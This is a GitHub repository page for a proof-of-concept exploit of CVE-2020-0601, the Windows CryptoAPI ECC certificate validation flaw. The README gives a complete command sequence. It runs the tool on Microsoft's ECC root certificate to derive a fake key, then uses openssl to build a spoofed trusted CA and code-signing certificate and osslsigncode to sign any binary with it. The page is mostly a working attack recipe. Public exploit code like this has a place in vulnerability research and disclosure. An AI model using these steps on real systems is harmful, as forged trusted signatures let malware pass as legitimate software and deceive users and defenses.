- Notifications
You must be signed in to change notification settings - Fork4
ioncodes/Curveball
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
A PoC forCVE-2020-0601. A detailed blog post can be foundhere. This exploit allows you to create a fake trusted certificate by abusing how CryptoAPI handles certain parameters on ECC based certificates.
Clone the repository and open it in Visual Studio 2019. Switch to Release and compile it. You can find prebuilt binarieshere.
.\Curveball.exe MicrosoftECCProductRootCertificateAuthority.cer MicrosoftECCProductRootCertificateAuthority_fake.key# in linux bash (you can also use Windows but you'd have to get an alternative for osslsigncode). WSL on Windows works fine.openssl req -new -x509 -key MicrosoftECCProductRootCertificateAuthority_fake.key -out trusted_ca.crtopenssl ecparam -name secp384r1 -genkey -noout -out cert.keyopenssl req -new -key cert.key -out cert.csr -config openssl.conf -reqexts v3_csopenssl x509 -req -in cert.csr -CA trusted_ca.crt -CAkey MicrosoftECCProductRootCertificateAuthority_fake.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl.conf -extensions v3_csopenssl pkcs12 -export -in cert.crt -inkey cert.key -certfile trusted_ca.crt -name"Code Signing" -out cert.p12./osslsigncode sign -pkcs12 cert.p12 -n"Signed by Layle" -in<BINARY_TO_SIGN> -out<SIGNED_BINARY>
Note that the 7zip installer is usually not signed!
About
PoC for CVE-2020-0601 - CryptoAPI exploit
Resources
Stars
Watchers
Forks
Packages0
No packages published